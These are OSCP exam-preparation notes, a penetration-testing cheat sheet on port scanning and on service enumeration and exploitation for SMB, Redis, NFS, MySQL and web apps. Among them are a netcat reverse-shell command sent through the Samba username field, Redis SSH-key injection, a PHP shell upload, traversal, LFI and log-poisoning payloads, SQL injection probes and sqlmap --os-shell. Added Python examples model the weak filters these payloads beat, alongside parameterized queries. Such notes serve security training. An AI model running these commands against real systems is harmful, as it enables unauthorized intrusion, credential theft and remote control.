OSCP Notes
Purpose
Provide detailed service enumeration and exploitation techniques for OSCP exam preparation. Cover protocol-specific attacks, common vulnerabilities, and proven exploitation methods for each major service.
Inputs/Prerequisites
- Kali Linux or penetration testing distribution
- Target IP addresses and network access
- Nmap, Metasploit, and standard pentest tools
- Understanding of network protocols
Outputs/Deliverables
- Service enumeration results
- Identified vulnerabilities
- Working exploits and shell access
- Captured credentials
- Documented attack methodology
Core Workflow
1. Port Scanning
# Comprehensive Nmap scan
nmap -sC -sV -oN nmap -A -T5 10.10.10.x # -oN/-oA take the output filename; bare -o is not an nmap option
# Host discovery
nmap -sn 10.10.1.1-254 -vv -oA hosts
netdiscover -r 10.10.10.0/24
# DNS server discovery
nmap -p 53 10.10.10.1-254 -vv -oA dcs
# NSE vulnerability scripts
nmap -sV --script=vulscan/vulscan.nse TARGET
# List available scripts
ls /usr/share/nmap/scripts/ssh*
ls /usr/share/nmap/scripts/smb*
# Full port scan
masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | uniq | tr '\n' ',')
nmap -Pn -sV -sC -p$ports 10.10.10.x
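The awk pipeline above folds every masscan hit into one comma list, so UDP ports found by `-pU:1-65535` end up in a TCP-only nmap `-p` list. Added example, not from the original notes: a small Python parser for the same "Discovered open port" lines that keeps the protocols apart and emits an nmap port spec with `T:`/`U:` prefixes. The masscan output below is constructed.

```python
"""Parse masscan "Discovered open port" lines into per-host, per-protocol port lists.

Added example, not part of the original notes. Input format is masscan's stdout
(what the notes redirect into the "ports" file); the sample below is constructed.
"""
import re
from collections import defaultdict

# Constructed sample of masscan stdout, including a duplicate hit and a progress line.
SAMPLE_OUTPUT = """\
Discovered open port 445/tcp on 10.10.10.5
Discovered open port 22/tcp on 10.10.10.5
Discovered open port 161/udp on 10.10.10.5
Discovered open port 445/tcp on 10.10.10.5
Discovered open port 80/tcp on 10.10.10.5
rate:  1.00-kpps, 100.00% done, 0:00:00 remaining, found=5
"""

LINE_RE = re.compile(r"Discovered open port (\d+)/(tcp|udp) on (\S+)")


def parse_masscan(text):
    """Return {host: {"tcp": [ports], "udp": [ports]}}, sorted and deduplicated."""
    found = defaultdict(lambda: {"tcp": set(), "udp": set()})
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # rate/progress lines carry no port information
        port, proto, host = int(m.group(1)), m.group(2), m.group(3)
        found[host][proto].add(port)
    return {h: {p: sorted(s) for p, s in protos.items()} for h, protos in found.items()}


def nmap_port_spec(ports_by_proto):
    """Build the -p argument for the follow-up scan, e.g. 'T:22,80,445,U:161'."""
    parts = []
    if ports_by_proto["tcp"]:
        parts.append("T:" + ",".join(map(str, ports_by_proto["tcp"])))
    if ports_by_proto["udp"]:
        parts.append("U:" + ",".join(map(str, ports_by_proto["udp"])))
    return ",".join(parts)


if __name__ == "__main__":
    for host, ports in parse_masscan(SAMPLE_OUTPUT).items():
        # UDP entries in -p only get scanned when -sU is present alongside the TCP scan type.
        print(f"nmap -Pn -sV -sC -sS -sU -p{nmap_port_spec(ports)} {host}")
```

Pipe the real file in with `python3 parse_masscan.py < ports` after swapping `SAMPLE_OUTPUT` for `sys.stdin.read()`; the regex ignores masscan's banner and rate lines, so no pre-filtering with grep is needed.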
2. FTP Enumeration (Port 21)
# Check anonymous access
ftp TARGET
# Username: anonymous
# Password: anonymous
# Upload files if writable
ftp> put shell.php
# Common FTP exploits:
# - vsftpd 2.3.4 Backdoor
# - ProFTPD 1.3.5 mod_copy
# Nmap scripts
nmap --script ftp-anon TARGET
nmap --script ftp-vsftpd-backdoor TARGET
3. SSH Enumeration (Port 22)
# Key-based authentication
# id_rsa.pub: Public key for authorized_keys
# id_rsa: Private key for login
# Login with private key
ssh -i id_rsa user@TARGET
# Crack key passphrase
ssh2john id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
# Passwordless login setup
# Add id_rsa.pub to target's ~/.ssh/authorized_keys
# Banner grabbing
ssh -v TARGET
nmap -p 22 --script ssh-hostkey TARGET
4. DNS Enumeration (Port 53)
# Add host to /etc/hosts first
echo "10.10.10.135 target.htb" >> /etc/hosts
# Zone transfer
dig axfr target.htb @10.10.10.135
dnsrecon -d target.htb -t axfr
# Subdomain brute force
dnsrecon -d target.htb -t brt -D /usr/share/wordlists/subdomains.txt
# Reverse lookup
dnsrecon -r 10.10.10.0/24 -n 10.10.10.135
5. RPC Enumeration (Port 111/135)
# RPC Bind (111)
rpcclient --user="" --command=enumprivs -N TARGET
rpcinfo -p TARGET # rpcbind is the portmapper daemon itself; rpcinfo is the client that queries it
# MS RPC (135)
rpcdump.py TARGET -p 135
rpcdump.py TARGET -p 135 | grep ncacn_np # Get pipe names
rpcmap.py ncacn_ip_tcp:TARGET[135]
6. SMB Enumeration (Port 139/445)
# Protocol detection
nmap --script smb-protocols TARGET
# List shares
smbclient -L //TARGET
smbclient -L //TARGET -N # Null session
smbclient --no-pass -L TARGET
# Connect to share
smbclient //TARGET/share_name
smbclient -U "username%password" //TARGET/sharename
# SMB Map enumeration
smbmap -H TARGET
smbmap -H TARGET -u '' -p ''
smbmap -H TARGET -s share_name
# CrackMapExec
crackmapexec smb TARGET -u '' -p '' --shares
crackmapexec smb TARGET -u 'user' -p 'pass' --shares
# Enum4Linux comprehensive
enum4linux -a TARGET
# RPC client enumeration
rpcclient -U "" TARGET
rpcclient> enumdomusers
rpcclient> enumdomgroups
rpcclient> queryuser [rid]
rpcclient> getdompwinfo
# Brute force
ncrack -u username -P rockyou.txt -T 5 TARGET -p smb -v
# Mount share
mount -t cifs "//TARGET/share/" /mnt/smb
mount -t cifs "//TARGET/share/" /mnt/smb -o vers=1.0,user=root,uid=0,gid=0
# SMB to reverse shell
smbclient -U "username%password" //TARGET/sharename
smb> logon "/=nc ATTACKER 4444 -e /bin/bash"
SMB Exploits:
| Vulnerability | Versions | Exploit |
|---|---|---|
| Samba usermap script (CVE-2007-2447) | 3.0.20-3.0.25rc3 | RCE via username |
| EternalBlue (CVE-2017-0144) | Windows Vista-10, Server 2008-2016 | MS17-010 |
| SambaCry (CVE-2017-7494) | Samba < 4.5.9 | Writable share RCE |
7. SNMP Enumeration (Port 161)
# Basic enumeration
snmpwalk -c public -v1 TARGET
snmpcheck -t TARGET -c public
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt TARGET
# Nmap scan
nmap -sU -p 161 TARGET
# SNMP enum
snmpenum -t TARGET
# MIB values
snmpwalk -c public -v1 TARGET 1.3.6.1.2.1.25.4.2.1.2 # Running processes
snmpwalk -c public -v1 TARGET 1.3.6.1.2.1.25.6.3.1.2 # Installed software
snmpwalk -c public -v1 TARGET 1.3.6.1.4.1.77.1.2.25 # User accounts
8. IRC Enumeration (Port 194/6667)
# Nmap scripts
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 TARGET
# UnrealIRCd 3.2.8.1 Backdoor exploit available
9. NFS Enumeration (Port 2049)
# Show exports
showmount -e TARGET
# Mount share
mkdir /mnt/nfs
mount -t nfs TARGET:/share /mnt/nfs
# Permission issues
# If permission denied, create a local user whose UID matches the file owner's UID (NFS maps access by numeric UID)
10. MySQL Enumeration (Port 3306)
# Nmap scripts
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 TARGET
# Connect to database
mysql -h TARGET -u root -p
# Basic queries
SHOW databases;
USE database;
SHOW tables;
SELECT * FROM users;
11. Redis Enumeration (Port 6379)
# Connect to Redis
redis-cli -h TARGET
# Get configuration
CONFIG GET *
# SSH key injection (if writable)
# Write to /var/lib/redis/.ssh/ or /home/redis/.ssh/
# Generate SSH key
ssh-keygen -t rsa -f redis_key
# Upload key
redis-cli -h TARGET
CONFIG SET dir /var/lib/redis/.ssh/
CONFIG SET dbfilename "authorized_keys"
SET ssh_key "\n\nssh-rsa AAAA...\n\n"
SAVE
12. Web Application Attacks
Directory Traversal:
# Linux
../../../etc/passwd
....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd
# Windows
..\..\..\windows\system32\drivers\etc\hosts
..%5c..%5c..%5cwindows\system32\config\sam
Local File Inclusion:
# Read files
page=../../../etc/passwd
# PHP filter (read source)
page=php://filter/convert.base64-encode/resource=index.php
# Log poisoning
# Inject PHP into User-Agent, then include access log
page=/var/log/apache2/access.log
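The traversal and LFI strings above are each built to get past a particular weak server-side check. Added example, not code from the original notes: a Python model of the two checks, the strip-`../`-once filter those payloads evade, and a resolver that fully URL-decodes, normalizes and confines the path to an assumed document root (`/var/www/html`, a placeholder). Run against the page's own payloads it shows which form defeats which check; notably, without the strip-once filter in front of it, `....//` resolves to a nonexistent directory literally named `....` inside the root, which is why that form only works against filters that remove `../` a single time.

```python
"""Model of a weak traversal filter next to a resolve-and-confine check.

Added example, not part of the original notes. WEB_ROOT is an assumed document
root; the payloads exercised in the test are the ones listed in the notes.
"""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed document root


def fully_decode(value, max_rounds=5):
    """URL-decode until the string stops changing, so %252f and %5c are both unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def weak_sanitize(value):
    """The filter the ....// and ..%252f forms are designed for: strips '../' once, no decoding."""
    return value.replace("../", "").replace("..\\", "")


def resolve(value, web_root=WEB_ROOT):
    """Absolute, normalized path the include would reach; None for stream wrappers."""
    decoded = fully_decode(value).replace("\\", "/")  # treat backslash as a separator
    if "://" in decoded:
        return None  # php://filter, file:// and friends are never plain files
    candidate = decoded if decoded.startswith("/") else posixpath.join(web_root, decoded)
    return posixpath.normpath(candidate)


def is_within_root(path, web_root=WEB_ROOT):
    """Containment check on the resolved path, not on the raw string."""
    if path is None:
        return False
    root = web_root.rstrip("/")
    return path == root or path.startswith(root + "/")


def weak_filter_escapes(value, web_root=WEB_ROOT):
    """True if the strip-once filter still lets the request reach something outside web_root."""
    return not is_within_root(resolve(weak_sanitize(value), web_root), web_root)


def strict_check_allows(value, web_root=WEB_ROOT):
    """True only if the fully decoded, normalized path stays inside web_root."""
    return is_within_root(resolve(value, web_root), web_root)


if __name__ == "__main__":
    for payload in ["../../../etc/passwd", "....//....//....//etc/passwd",
                    "..%252f..%252f..%252fetc/passwd", "/var/log/apache2/access.log",
                    "php://filter/convert.base64-encode/resource=index.php", "index.php"]:
        print(f"{payload!r:60} weak_escapes={weak_filter_escapes(payload)} "
              f"strict_allows={strict_check_allows(payload)}")
```

The design point is that only `resolve` plus `is_within_root` is a real control; `weak_sanitize` is kept solely to show how each payload slips through it. In a real handler the containment check must run on the same decoded value the application then opens, otherwise the two can disagree.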
SQL Injection:
# Basic tests
' OR 1=1--
" OR 1=1--
' UNION SELECT NULL--
# SQLMap
sqlmap -u "http://TARGET/page.php?id=1" --dbs
sqlmap -u "http://TARGET/page.php?id=1" -D database -T users --dump
sqlmap -u "http://TARGET/page.php?id=1" --os-shell
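What the basic tests above actually do to a query, shown side by side with the fix. Added example, not code from the original notes or from sqlmap: an in-memory SQLite table with constructed rows, a login check written with string formatting (the defect the `' OR 1=1--` probe confirms) and the same check with bound parameters. The `' UNION SELECT NULL--` probe is included to show why it returns a row when the column count matches.

```python
"""String-built vs parameterized query under the notes' SQL injection probes.

Added example, not part of the original notes. Uses SQLite in memory; the user
rows are constructed.
"""
import sqlite3


def make_db():
    """Constructed sample table with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the input becomes part of the SQL grammar."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    # With username = "' OR 1=1--" this reads:
    #   ... WHERE username = '' OR 1=1--' AND password = '...'
    # and everything after -- is a comment, so the password clause is gone.
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    """Bound parameters: the input is only ever compared as data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def demo():
    """Run both forms against the probes from the notes and a legitimate login."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, "' OR 1=1--", "anything"),
        "union_probe": login_vulnerable(conn, "' UNION SELECT NULL--", "anything"),
        "parameterized": login_parameterized(conn, "' OR 1=1--", "anything"),
        "legit": login_parameterized(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:14} -> {rows}")
```

The `union_probe` result is a single `None` row: the injected `SELECT NULL` has the same column count as the original query, which is exactly what the `UNION SELECT NULL--` test is checking for before a real column list is substituted.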
Quick Reference
Important File Locations
Linux:
/etc/passwd
/etc/shadow
/etc/hosts
/home/user/.ssh/id_rsa
/var/log/auth.log
Windows:
C:\Windows\System32\config\SAM
C:\Windows\System32\drivers\etc\hosts
C:\Users\Administrator\NTUser.dat
C:\inetpub\wwwroot\web.config
Common Ports Quick Reference
| Port | Service | First Actions |
|---|---|---|
| 21 | FTP | Check anonymous, upload |
| 22 | SSH | Key auth, brute force |
| 25 | SMTP | User enum, relay |
| 53 | DNS | Zone transfer |
| 80/443 | HTTP/S | Dir enum, vulns |
| 139/445 | SMB | Share enum, exploits |
| 161 | SNMP | Community brute |
| 3306 | MySQL | Default creds |
Constraints
- Exploits are version-specific
- Some services require credentials
- Firewalls may block enumeration
- Rate limiting may affect scanning
Examples
Example 1: Quick SMB Check
smbclient -L //TARGET -N && enum4linux -a TARGET
Example 2: Full Service Enum
nmap -sV -sC -p- TARGET -oA full_scan
Troubleshooting
| Issue | Solution |
|---|---|
| Connection refused | Check if service is running |
| Access denied | Try null session or default creds |
| Timeout | Reduce scan speed, check firewall |
| No results | Try different enumeration technique |